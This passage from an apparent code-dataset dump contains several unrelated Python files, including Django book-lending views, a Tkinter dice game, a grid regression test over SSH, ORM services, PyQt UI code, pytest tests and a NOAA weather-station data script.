history})\n return context\n else:\n return context\n\n def post(self, request, *args, **kwargs):\n bookinstance = BookInstance.objects.get(pk=kwargs['pk'])\n if 'record_return' in request.POST:\n messages.add_message(request, messages.SUCCESS, 'Return recoded.')\n bookinstance.record_return()\n e = BookExchangeEvent(\n status='IL',\n bookinstance=bookinstance,\n date=timezone.now(),\n give_back_date=timezone.now()\n )\n e.save()\n return redirect(reverse_lazy('book_instance_details', kwargs={'pk': kwargs['pk']}))\n else:\n form = LendingForm(request.POST)\n print('form1!!!')\n if form.is_valid():\n print('VALID FORM')\n if request.POST.get('lend_outside'):\n e = BookExchangeEvent(\n status='LO',\n bookinstance=bookinstance,\n date=timezone.now(),\n give_back_date=request.POST.get('give_back_date')\n )\n e.save()\n bookinstance.lent_outside = True\n bookinstance.save()\n elif request.POST.get('lend_to_someone', 0):\n user = User.objects.get(pk=request.POST.get('lend_to_someone'))\n e = BookExchangeEvent(\n status='LU',\n date=timezone.now(),\n bookinstance=bookinstance,\n reader=user,\n give_back_date=request.POST.get('give_back_date')\n )\n e.save()\n bookinstance.lent_to_someone = user\n bookinstance.save()\n messages.add_message(request, messages.SUCCESS, 'Lending successful.')\n else:\n messages.add_message(request, messages.WARNING, 
'Provided date is incorrect')\n return redirect(reverse_lazy('book_instance_details', kwargs={'pk': kwargs['pk']}))\n\n\nclass FriendLibraryList(ListView):\n model = BookInstance\n template_name = 'bookinstance_list.html'\n\n def get_context_data(self, *args, **kwargs):\n context = super(FriendLibraryList, self).get_context_data(**kwargs)\n if self.request.user.is_authenticated():\n my_object = get_object_or_404(User, pk=self.kwargs['pk'])\n context.update({'foreign': True})\n\n friends_id = self.kwargs['pk']\n owner = User.objects.get(id=friends_id)\n context.update({'friend': owner})\n if owner == self.request.user:\n context.update({'owner': True})\n # Check if we have access to this library\n if not LibraryFriend.objects.filter(user=owner, mail=self.request.user.email).exists():\n context.update({'alien': True})\n else:\n q = BookInstance.objects.filter(reader=owner)\n context.update({'queryset': q})\n return context\n else:\n return context\n\n\nclass FriendsMainView(TemplateView):\n template_name = 'user_catalog/friends_template.html'\n success_url = reverse_lazy('friends')\n\n def get_context_data(self, **kwargs):\n context = super(FriendsMainView, self).get_context_data(**kwargs)\n if self.request.user.is_authenticated():\n mails = LibraryFriend.objects.filter(user=self.request.user)\n context.update({'invited': mails})\n\n invitations = LibraryFriend.objects.filter(mail=self.request.user.email)\n context.update({'invitations': invitations})\n return context\n\n def post(self, request, *args, **kwargs):\n mail_address = request.POST['invite']\n if not re.match(r\"[^@]+@[^@]+\\.[^@]+\", mail_address):\n messages.add_message(request, messages.WARNING, 'Invalid email address.')\n return redirect(self.success_url)\n\n if mail_address == self.request.user.email:\n messages.add_message(request, messages.WARNING, 'You cannot invite yourself.')\n return redirect(self.success_url)\n\n if not User.objects.filter(email=mail_address).exists():\n try:\n invite = Invitation.create(mail_address, inviter=request.user)\n invite.send_invitation(request)\n messages.add_message(request, messages.INFO, 'An invitation has been sent!')\n except IntegrityError:\n messages.add_message(request, messages.WARNING, 'User already invited!')\n else:\n messages.add_message(request, messages.WARNING, 'User already exists in the system!')\n # If this user is our friend already\n if LibraryFriend.objects.filter(mail=mail_address, user=self.request.user).exists():\n messages.add_message(request, messages.WARNING, 'This user is your friend already.')\n return redirect(self.success_url)\n # Create an instance of LibraryFrend here\n messages.add_message(request, messages.INFO, 'Mail added to a friend base.')\n friend = LibraryFriend(user=self.request.user, mail=mail_address)\n friend.save()\n self.object = None\n return redirect(self.success_url)","sub_path":"bookstore/user_catalog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"258690701","text":"from tkinter import *\nimport random\n\nroot = Tk()\nx=0\nroot.title(\"ACTION\")\n\nframe = Frame(root,background='red')\nframe.pack()\ncanvas = Canvas(height=180,width=120)\ncanvas.pack()\nimage2 = PhotoImage(file=\"one.png\")\ncanvas.create_image(0, 0,anchor='nw', image=image2)\ncanvas.image = image2\n\ndef roll():\n global x\n x=random.randrange(1,7)\n if(x is 1):\n canvas.delete(\"all\")\n image1 = PhotoImage(file=\"one.png\")\n 
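        # redraw the rolled face; keeping a reference on the canvas (canvas.image) stops Tkinter from garbage-collecting the image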
canvas.create_image(0, 0, anchor='nw', image=image1)\n canvas.image = image1\n elif(x is 2):\n canvas.delete(\"all\")\n image1 = PhotoImage(file=\"two.png\")\n canvas.create_image(0, 0, anchor='nw', image=image1)\n canvas.image = image1\n elif(x is 3):\n canvas.delete(\"all\")\n image1 = PhotoImage(file=\"three.png\")\n canvas.create_image(0, 0, anchor='nw', image=image1)\n canvas.image = image1\n elif(x is 4):\n canvas.delete(\"all\")\n image1 = PhotoImage(file=\"four.png\")\n canvas.create_image(0, 0, anchor='nw', image=image1)\n canvas.image = image1\n elif(x is 5):\n canvas.delete(\"all\")\n image1 = PhotoImage(file=\"five.png\")\n canvas.create_image(0, 0, anchor='nw', image=image1)\n canvas.image = image1\n else:\n canvas.delete(\"all\")\n image1 = PhotoImage(file=\"six.png\")\n canvas.create_image(0, 0, anchor='nw', image=image1)\n canvas.image = image1\n\nbutton1=Button(frame,text=\"roll it\",width=25,fg=\"white\",bg=\"black\",command=roll)\nbutton1.pack(side=RIGHT)\nroot.mainloop()\n\n","sub_path":"untitled/dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"150943610","text":"configuration = {\n 'root_path': '/Users/howllow/SharedWithUB/Distributed-PageRank/',\n 'data_path': 'slash.txt',\n 'jitter': '\\t',\n 'splitter': 'random', # another option is 'random'\n 'split_part': 2,\n 'tmp_data': 'tmp/',\n 'node_path': 'node.txt',\n 'edge_path': 'edge.txt',\n 'split_path': 'split.txt',\n 'subgraph_path': 'slash.random.',\n 'graph_path': 'graph.txt'\n}","sub_path":"GraphCut/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"420451683","text":"#\n# Bug: 87994\n# Title: yaim-wms doesn't fill the attributes get_acbr and get_owner in the conf file for Glue2\n# Link: https://savannah.cern.ch/bugs/?87994\n#\n#\n\nimport logging\n\nfrom libutils.Exceptions import *\n\ndef run(utils):\n\n bug='87994'\n\n\n if utils.YAIM_FILE=='':\n raise GeneralError(\"Missing required variable (YAIM_FILE)\",\"To verify this bug it is necessary to set the YAIM_FILE in the configuration file\")\n \n logging.info(\"Start regression test for bug %s\"%(bug))\n\n logging.warning(\"To verify this bug you need access to WMS. 
You have to set the WMS_USERNAME and WMS_PASSWORD attributes in the configuration file\")\n\n    ssh=utils.open_ssh(utils.get_WMS(),utils.get_Username(),utils.get_Password())\n\n    target=\"/etc/glite/info/service/glite-info-glue2-wmproxy.conf\"\n\n    utils.ssh_get_file(ssh, \"%s\"%(target), \"%s/local_copy\"%(utils.get_tmp_dir()))\n\n    utils.ssh_get_file(ssh, \"%s\"%(utils.YAIM_FILE), \"%s/yaim_local_copy\"%(utils.get_tmp_dir()))\n\n    ssh.close()\n    \n    logging.info(\"Parse yaim file to find all the supported VOs\")\n\n    FILE=open(\"%s/yaim_local_copy\"%(utils.get_tmp_dir()),\"r\")\n    yaim=FILE.readlines()\n    FILE.close()\n\n    for line in yaim:\n        if line.find(\"VOS\")!=-1:\n            vos=line.split(\"=\")[1].strip(\" \\\"\\n\").split(\" \")\n            logging.info(\"Find the following VOs: %s\"%(vos))\n            break\n\n    VOS=[]\n\n    for vo in vos:\n        VOS.append(\"VO:%s\"%(vo))\n\n    logging.info(\"Parse file /etc/glite/info/service/glite-info-glue2-wmproxy.conf to find attributes get_acbr and get_owner\")\n    \n    FILE=open(\"%s/local_copy\"%(utils.get_tmp_dir()),\"r\")\n    lines=FILE.readlines()\n    FILE.close()\n\n    get_acbr=''\n    get_owner=''\n\n    for line in lines:\n        if line.find(\"get_acbr\")!=-1:\n            get_acbr=line\n            logging.info(\"Attribute get_acbr: %s\"%(get_acbr))\n        \n        if line.find(\"get_owner\")!=-1:\n            get_owner=line\n            logging.info(\"Attribute get_owner: %s\"%(get_owner))\n\n\n    logging.info(\"Check attribute get_acbr\")\n\n    # fixed: each check previously inspected the opposite attribute;\n    # get_acbr is matched against the \"VO:\"-prefixed entries (VOS), get_owner against the plain VO names (vos)\n    if get_acbr.find(\"\\\\n\".join(VOS))==-1:\n        logging.error(\"Unable to find all supported VOs in attribute get_acbr.\")\n        raise GeneralError(\"Check attribute get_acbr\",\"Unable to find all the supported VOs in attribute get_acbr.\")\n    else:\n        logging.info(\"Find all supported VOs in attribute get_acbr\")\n\n    logging.info(\"Check attribute get_owner\")\n    \n    if get_owner.find(\"\\\\n\".join(vos))==-1:\n        logging.error(\"Unable to find all the supported VOs in attribute get_owner.\")\n        raise GeneralError(\"Check attribute get_owner\",\"Unable to find all the supported VOs in attribute get_owner.\")\n    else:\n        logging.info(\"Find all supported VOs in attribute get_owner\")\n    \n    logging.info(\"Test OK\")\n    \n    logging.info(\"End of regression test for bug %s\",bug)\n","sub_path":"regression_tests/bugs/87994.py","file_name":"87994.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"92699934","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nimport sys\n\ntraces = [];\n\nclass Tracer(object):\n    depth = 0\n    filename = ''\n\n    def __enter__(self):\n        sys.settrace(self.trace)\n\n    def __exit__(self, exception_type, value, tb):\n        sys.settrace(None)\n\n    def trace(self, frame, event, args):\n        filename = frame.f_code.co_filename\n        if not filename or not 'auger' in filename:\n            return\n        lineno = frame.f_lineno\n        name = frame.f_code.co_name\n        if event == 'call':\n            self.log(filename, lineno, '%s(%s)' % (name, str(frame.f_locals)))\n            self.depth += 1\n        elif event == 'return':\n            self.log(filename, lineno, ' => %s' % repr(args))\n            self.depth -= 1\n        elif event == 'line':\n            self.log(filename, lineno, '')\n        return self.trace\n\n    def log(self, filename, lineno, message):\n        output = \"\"\n        if filename != self.filename:\n            output += '\\n%s\\n' % filename\n            self.filename = filename\n        with open(filename) as fp:\n            line = fp.readlines()[lineno - 1][:-1].strip()\n        output += '%06s' % lineno + ' ' + ' ' * self.depth + ' ' + line\n        if message:\n            output += ' # ' + message\n        print(output)\n 
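        # also keep the rendered line in the module-level traces list so callers can inspect the collected trace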
traces.append(output)\n","sub_path":"auger/tracer.py","file_name":"tracer.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"120189813","text":"# coding: utf-8\n\nfrom collections import namedtuple\n\nfrom home_crm.core.services import BaseDjangoORMService\nfrom .models import Good, Commodity\n\n\nGoodStub = namedtuple(\n 'GoodStub', ['id_price', 'id_commodity', 'full_name', 'count', 'barcode'])\n\nCommodityStub = namedtuple('CommodityStub', ['id', 'name', 'category'])\n\n\nclass GoodServiceException(BaseDjangoORMService.ServiceException):\n pass\n\n\nclass GoodArgumentExc(GoodServiceException):\n pass\n\n\nclass GoodNotPriceException(GoodServiceException):\n pass\n\n\nclass GoodNotFountException(GoodServiceException):\n pass\n\n\nclass CommodityService(BaseDjangoORMService):\n\n @classmethod\n def get_by_id(cls, id: int) -> Commodity:\n return Commodity.objects.get(pk=id)\n\n @classmethod\n def get_all_commodity_with_price(cls):\n commodity_all = Commodity.objects.all()\n return commodity_all\n\n @classmethod\n def get_or_create_commodity(cls, name, thematic=None, numeric=None):\n try:\n commodity = Commodity.objects.get(name=name)\n except Commodity.DoesNotExist:\n return False, Commodity(\n name=name, thematic=thematic, numeric=numeric)\n else:\n return True, commodity\n\n @classmethod\n def get_commodity(cls, name):\n return Commodity.objects.filter(name=name).first()\n\n\nclass GoodService(BaseDjangoORMService):\n @classmethod\n def get_goods(cls):\n return Good.objects.all()\n\n @classmethod\n def get_or_create_commodity_numbers(\n cls, commodity_id, number_local=None, number_global=None, id=None):\n commodity = CommodityService.get_by_id(commodity_id)\n\n if commodity.numeric:\n if not number_local and not number_global:\n raise GoodArgumentExc(\n \"Для номерного товара '%s' не указаны номера\" %\n str(commodity.name))\n\n if commodity.numeric is False:\n if number_local or number_global:\n raise GoodArgumentExc(\n \"Для безномерного товара '%s' нельзя указывать номера\" %\n str(commodity.name))\n\n try:\n if id:\n good = Good.objects.get(\n commodity_id=commodity_id,\n number_local=number_local,\n number_global=number_global\n ).exclude(pk=id)\n else:\n good = Good.objects.get(\n commodity_id=commodity_id,\n number_local=number_local,\n number_global=number_global)\n except Good.DoesNotExist:\n if id:\n return False, Good.objects.get(pk=id)\n else:\n return False, Good(commodity_id=commodity_id,\n number_local=number_local,\n number_global=number_global)\n else:\n return True, good\n\n @classmethod\n def get_good_exlude_invoice(cls, invoice_id):\n return Good.objects.exclude(\n invoiceitem__invoice_id=invoice_id\n ).all()\n\n @classmethod\n def get_good(cls, id):\n good = Good.objects.get(pk=id)\n if not good:\n raise GoodNotFountException(u\"Не найдено записи в БД\")\n\n return good\n\n @classmethod\n def get_price(cls, good_id):\n from price.services import PriceService\n good = cls.get_good(good_id)\n if good.price_id:\n return PriceService.get_price(good.price_id)\n\n @classmethod\n def full_name(cls, good):\n return cls.generate_name(good.commodity.name, good.number_local,\n good.number_global)\n\n @classmethod\n def generate_name(cls, name, number_local=None, number_global=None):\n numeric = True if number_local and number_global else False\n if numeric:\n full_name = name + u\" №\" + str(number_local) + u\"(\" + str(\n number_global) + u\")\"\n else:\n full_name = name\n return 
full_name\n\n @classmethod\n def update_good(cls, session, id, barcode, commodity_id, number_local=None,\n number_global=None, price_id=None,\n full_name=None):\n good = cls.get_good(id)\n good.barcode = barcode\n good.commodity_id = commodity_id\n good.number_local = number_local\n good.number_global = number_global\n good.price_id = price_id\n\n if not full_name:\n full_name = GoodService.full_name(good)\n good.full_name = full_name\n\n session.add(good)\n","sub_path":"home_crm/goods/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"159267241","text":"from PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(820, 309)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.formLayout = QtWidgets.QFormLayout()\n self.formLayout.setObjectName(\"formLayout\")\n self.labelUser = QtWidgets.QLabel(self.centralwidget)\n font = QtGui.QFont()\n font.setPointSize(12)\n self.labelUser.setFont(font)\n self.labelUser.setObjectName(\"labelUser\")\n self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.labelUser)\n self.lineEdit = QtWidgets.QLineEdit(self.centralwidget)\n self.lineEdit.setMinimumSize(QtCore.QSize(0, 30))\n self.lineEdit.setObjectName(\"lineEdit\")\n self.formLayout.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.lineEdit)\n self.label = QtWidgets.QLabel(self.centralwidget)\n font = QtGui.QFont()\n font.setPointSize(12)\n self.label.setFont(font)\n self.label.setObjectName(\"label\")\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.label)\n self.comboBox = QtWidgets.QComboBox(self.centralwidget)\n self.comboBox.setMinimumSize(QtCore.QSize(0, 30))\n self.comboBox.setObjectName(\"comboBox\")\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.comboBox)\n self.verticalLayout.addLayout(self.formLayout)\n self.pushButton = QtWidgets.QPushButton(self.centralwidget)\n self.pushButton.setObjectName(\"pushButton\")\n self.verticalLayout.addWidget(self.pushButton)\n self.labelResult = QtWidgets.QLabel(self.centralwidget)\n font = QtGui.QFont()\n font.setPointSize(12)\n self.labelResult.setFont(font)\n self.labelResult.setText(\"\")\n self.labelResult.setObjectName(\"labelResult\")\n self.verticalLayout.addWidget(self.labelResult)\n self.labelRes2 = QtWidgets.QLabel(self.centralwidget)\n self.labelRes2.setText(\"\")\n self.labelRes2.setObjectName(\"labelRes2\")\n self.verticalLayout.addWidget(self.labelRes2)\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 820, 26))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.labelUser.setText(_translate(\"MainWindow\", \"Username\"))\n 
self.label.setText(_translate(\"MainWindow\", \"Действие\"))\n self.pushButton.setText(_translate(\"MainWindow\", \"OK\"))","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"546667596","text":"import pandas as pd\nimport pytest\nfrom hyperopt.pyll import Apply\n\nfrom poptimizer.config import AFTER_TAX\nfrom poptimizer.ml.feature import divyield\n\n\n@pytest.fixture(scope=\"module\", name=\"feat\")\ndef test_divyield_feature():\n return divyield.DivYield(\n (\"PHOR\", \"TATN\", \"DSKY\"), pd.Timestamp(\"2018-12-12\"), {\"days\": 47, \"periods\": 1}\n )\n\n\ndef test_col_names(feat):\n assert feat.col_names == [\"DivYield_0\"]\n\n\ndef test_is_categorical(feat):\n assert feat.is_categorical({\"days\": 47, \"periods\": 2}) == [False, False]\n\n\ndef test_get_params_space(feat):\n space = feat.get_params_space()\n assert isinstance(space, dict)\n assert len(space) == 3\n assert space[\"on_off\"] is True\n assert isinstance(space[\"days\"], Apply)\n assert isinstance(space[\"periods\"], Apply)\n\n\ndef test_get(feat):\n df = feat.get({\"days\": 13, \"periods\": 1})\n assert isinstance(df, pd.DataFrame)\n\n assert pd.Timestamp(\"2018-12-12\") in df.index\n assert pd.Timestamp(\"2018-12-13\") not in df.index\n assert pd.Timestamp(\"2010-01-26\") not in df.index\n\n df = feat.get(dict(days=9, periods=1))\n assert df.loc[(pd.Timestamp(\"2018-06-22\"), \"PHOR\"), \"DivYield_0\"] == pytest.approx(\n AFTER_TAX * 15 / 2291\n )\n assert df.loc[(pd.Timestamp(\"2018-06-25\"), \"PHOR\"), \"DivYield_0\"] == pytest.approx(\n 0\n )\n\n df = feat.get(dict(days=20, periods=1))\n assert df.loc[(pd.Timestamp(\"2018-06-11\"), \"PHOR\"), \"DivYield_0\"] == pytest.approx(\n AFTER_TAX * 15 / 2315\n )\n\n df = feat.get(dict(days=30, periods=1))\n assert df.loc[(pd.Timestamp(\"2018-10-11\"), \"TATN\"), \"DivYield_0\"] == pytest.approx(\n 30.27 * AFTER_TAX / 778.3\n )\n assert df.loc[(pd.Timestamp(\"2018-10-10\"), \"TATN\"), \"DivYield_0\"] == pytest.approx(\n 0\n )\n\n\ndef test_get_many_periods(feat):\n df = feat.get({\"days\": 9, \"periods\": 2})\n assert isinstance(df, pd.DataFrame)\n\n assert pd.Timestamp(\"2018-12-12\") in df.index\n assert pd.Timestamp(\"2018-12-13\") not in df.index\n\n assert df.columns.to_list() == [\"DivYield_0\", \"DivYield_1\"]\n\n assert df.loc[(pd.Timestamp(\"2018-06-08\"), \"PHOR\"), \"DivYield_0\"] == pytest.approx(\n 0\n )\n assert df.loc[(pd.Timestamp(\"2018-06-11\"), \"PHOR\"), \"DivYield_0\"] == pytest.approx(\n AFTER_TAX * 15 / 2315\n )\n assert df.loc[(pd.Timestamp(\"2018-06-15\"), \"PHOR\"), \"DivYield_0\"] == pytest.approx(\n AFTER_TAX * 15 / 2296\n )\n assert df.loc[(pd.Timestamp(\"2018-06-18\"), \"PHOR\"), \"DivYield_0\"] == pytest.approx(\n 0\n )\n\n assert df.loc[(pd.Timestamp(\"2018-06-15\"), \"PHOR\"), \"DivYield_1\"] == pytest.approx(\n 0\n )\n assert df.loc[(pd.Timestamp(\"2018-06-18\"), \"PHOR\"), \"DivYield_1\"] == pytest.approx(\n AFTER_TAX * 15 / 2295\n )\n assert df.loc[(pd.Timestamp(\"2018-06-21\"), \"PHOR\"), \"DivYield_1\"] == pytest.approx(\n AFTER_TAX * 15 / 2286\n )\n assert df.loc[(pd.Timestamp(\"2018-06-22\"), \"PHOR\"), \"DivYield_1\"] == pytest.approx(\n 0\n )\n","sub_path":"poptimizer/ml/feature/tests/test_divyield.py","file_name":"test_divyield.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"462854134","text":"# 
coding=utf-8\n# Iker Fuentes, David Castilla , Iker Cayero\n\n\"\"\"First we create a variable that holds a random number from 0 to 10, which we have to guess.\nWe use a while loop and an if to check whether the number we enter equals the randomly chosen one, and print the result.\"\"\"\nimport random\nnum = random.randrange(0,11)\nacierto = False\nwhile acierto == False:\n    x = int(input(\"Try to guess the number: \"))\n    if x == num:\n        print(\"YOU GOT IT!\")\n        acierto = True\n    else:\n        print(\"ERROR\")\n\n","sub_path":"Práctica9/Pràctica 9_Exercici1.py","file_name":"Pràctica 9_Exercici1.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"33307835","text":"# Download data sets from NOAA.\n#See weather_dataframe.py for converting this data into a combined dataframe.\nimport requests\nimport json\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport wget\nfrom mpl_toolkits.basemap import Basemap\nimport pickle\n\n# #Get API keys from JSON file\n# with open('keys.json') as key_file:\n#     keys=json.load(key_file)\n#NCDC's call to website.\n\nbiggest_cities=[\n    ['AL','Birmingham','Mobile','Huntsville'],\n    ['AK','Anchorage','Fairbanks','Juneau'],\n    ['AZ','Phoenix','Tucson','Mesa'],\n    ['AR','Little Rock','Fort Smith','Fayetteville'],\n    ['CA','Los Angeles','San Diego','San Jose'],\n    ['CO','Denver','Colorado Springs','Aurora'],\n    ['CT','Bridgeport','New Haven','Hartford'],\n    ['DE','Wilmington','Dover','Newark'],\n    ['FL','Jacksonville','Miami','Tampa'],\n    ['GA','Atlanta','Augusta','Columbus'],\n    ['HI','Honolulu','Hilo','Kailua'],\n    ['ID','Boise','Nampa','Idaho Falls'],\n    ['IL','Chicago','Aurora','Rockford'],\n    ['IN','Indianapolis','Fort Wayne','Evansville'],\n    ['IA','Des Moines','Cedar Rapids','Davenport'],\n    ['KS','Wichita','Overland Park','Kansas City'],\n    ['KY','Louisville','Lexington','Owensboro'],\n    ['LA','New Orleans','Shreveport','Baton Rouge'],\n    ['ME','Portland','Lewiston','Bangor'],\n    ['MD','Baltimore','Frederick','Gaithersburg'],\n    ['MA','Boston','Worcester','Springfield'],\n    ['MI','Detroit','Grand Rapids','Warren'],\n    ['MN','Minneapolis','St. Paul','Rochester'],\n    ['MS','Jackson','Gulfport','Biloxi'],\n    ['MO','Kansas City','St. 
Louis','Springfield'],\n ['MT','Billings','Missoula','Great Falls'],\n ['NE','Omaha','Lincoln','Bellevue'],\n ['NV','Las Vegas','Reno','Henderson'],\n ['NH','Manchester','Nashua','Concord'],\n ['NJ','Newark','Jersey City','Paterson'],\n ['NM','Albuquerque','Las Cruces','Rio Rancho'],\n ['NY','New York','Buffalo','Rochester'],\n ['NC','Charlotte','Raleigh','Greensboro'],\n ['ND','Fargo','Bismarck','Grand Forks'],\n ['OH','Columbus','Cleveland','Cincinnati'],\n ['OK','Oklahoma City','Tulsa','Norman'],\n ['OR','Portland','Salem','Eugene'],\n ['PA','Philadelphia','Pittsburgh','Allentown'],\n ['RI','Providence','Warwick','Cranston'],\n ['SC','Charleston','Columbia','North Charleston'],\n ['SD','Sioux Falls','Rapid City','Aberdeen'],\n ['TN','Memphis','Nashville','Knoxville'],\n ['TX','Houston','San Antonio','Dallas'],\n ['UT','Salt Lake City','West Valley City','Provo'],\n ['VT','Burlington','South Burlington','Rutland'],\n ['VA','Virginia Beach','Norfolk','Chesapeake'],\n ['WA','Seattle','Spokane','Tacoma'],\n ['WV','Charleston','Huntington','Parkersburg'],\n ['WI','Milwaukee','Madison','Green Bay'],\n ['WY','Cheyenne','Casper','Laramie']];\n\n\n#try to map states to power producing regions.\n#This is not quite correct, since some states are split between\n#multiple regions (TN, MS, ND). But will try as first attempt.\nregion_dict={\n 'AL':'Southeast',\n 'AK':'AK',\n 'AZ':'Southwest',\n 'AR':'Midwest',\n 'CA':'California',\n 'CO':'Northwest',\n 'CT':'Northeast',\n 'DE':'Northeast',\n 'FL':'Florida',\n 'GA':'Southeast',\n 'HI':'HI',\n 'ID':'Northwest',\n 'IL':'Midwest',\n 'IN':'Midwest',\n 'IA':'Midwest',\n 'KS':'Central',\n 'KY':'Mid-Atlantic',\n 'LA':'Midwest',\n 'ME':'Northeast',\n 'MD':'Mid-Atlantic',\n 'MA':'Northeast',\n 'MI':'Midwest',\n 'MN':'Midwest',\n 'MS':'Midwest',\n 'MO':'Midwest',\n 'MT':'Northwest',\n 'NE':'Central',\n 'NV':'Southwest',\n 'NH':'Northeast',\n 'NJ':'Mid-Atlantic',\n 'NM':'Southwest',\n 'NY':'New York',\n 'NC':'Carolinas',\n 'ND':'Central',\n 'OH':'Mid-Atlantic',\n 'OK':'Central',\n 'OR':'Northwest',\n 'PA':'Mid-Atlantic',\n 'RI':'Northeast',\n 'SC':'Carolinas',\n 'SD':'Central',\n 'TN':'Tennessee',\n 'TX':'Texas',\n 'UT':'Northwest',\n 'VT':'New England',\n 'VA':'Mid-Atlantic',\n 'WA':'Northwest',\n 'WV':'Mid-Atlantic',\n 'WI':'Midwest',\n 'WY':'Northwest'}\n\n\n# #now make a dict of city names, and station locations.\n# #Find allowed ID number corresponding to largest cities.\n# #Note not all of these have entries. \ndef get_airport_code(dataframe,city_list,depth=3):\n \"\"\"get_airport_code(dataframe,city_list,depth=3)\n Extract the ICAO code/callsign for one airport in each city.\n Return a dataframe with the city,state and callsign.\n \n dataframe: initial dataframe with list of global airports, locations, ICAO callsigns.\n city_list: list of lists cities to find the callsigns for. Containts cities in states.\n depth: how many cities in each state to look for. 
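    Cities with no matching airport entry are skipped with a console warning.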
\n\n\"\"\"\n aircode_df=pd.DataFrame()\n nrows=len(city_list)\n for i in range(0,nrows):\n for j in range(1,depth+1):\n city=city_list[i][j]\n state=city_list[i][0]\n msk=dataframe['City'].str.contains(city)\n #Need separate handling for Portland and Charleston.\n #(Ugly as sin, but should not break.)\n if (city =='Portland'):\n if (state=='OR'):\n call='KPDX'\n elif (state=='ME'):\n call='KPWM'\n msk=dataframe['ICAO'].str.contains(call)\n elif (city =='Charleston'):\n if (state=='SC'):\n call='KCHS'\n elif (state=='WV'): \n call='KCRW'\n msk=dataframe['ICAO'].str.contains(call)\n #If more than one entry, just pick the first one.\n #check there is an entry\n if (sum(msk)==0):\n print('could not find city:'+city)\n df_small=pd.DataFrame()\n #otherwise pick the first.\n else:\n df_small=dataframe[msk].head(n=1)\n df_small['State']=state\n aircode_df=aircode_df.append(df_small)\n\n aircode_df=aircode_df.rename(columns={'ICAO':'CALL'})\n return aircode_df\n\ndef make_airport_df():\n \"\"\"make_airport_df\n Read in a list of global airports, and extract their ICAO codes.\n Restrict then to US cities.\n \"\"\"\n #read in list of airports\n airport_df = pd.read_csv('data/airports.dat',skiprows=1,na_values='\\\\N')\n #only keep US airports, and name,city, and ICAO codes\n msk2=airport_df['Country']=='United States'\n airport_df=airport_df[msk2][['Name','City','ICAO']]\n \n airport_codes=get_airport_code(airport_df,biggest_cities)\n\n return airport_codes\n\ndef read_isd_df():\n \"\"\"make_airport_df\n Read in list of weather stations and USAF-WBAN codes for the weather stations. \n Trim to only stations that have operated since 2015.\n \"\"\"\n\n #now compare with stations from ISD database.\n isd_name_df=pd.read_fwf('data/ISD/isd-history.txt',skiprows=20)\n #also only keep airports still operational in time period.\n msk = isd_name_df['END']>20150000\n isd_name_df=isd_name_df[msk]\n isd_name_df=isd_name_df[['USAF','WBAN','CALL','LAT',\"LON\"]]\n return isd_name_df\n\ndef merge_air_isd(airport_codes,isd_name_df):\n \"\"\"merge_air_isd_df\n \n Merge the airport and weather data frames on name.\n Trim out duplicates.\n\n \"\"\"\n airport_total = pd.merge(airport_codes,isd_name_df,on='CALL')\n \n #drop any duplicated entries. (i.e. 
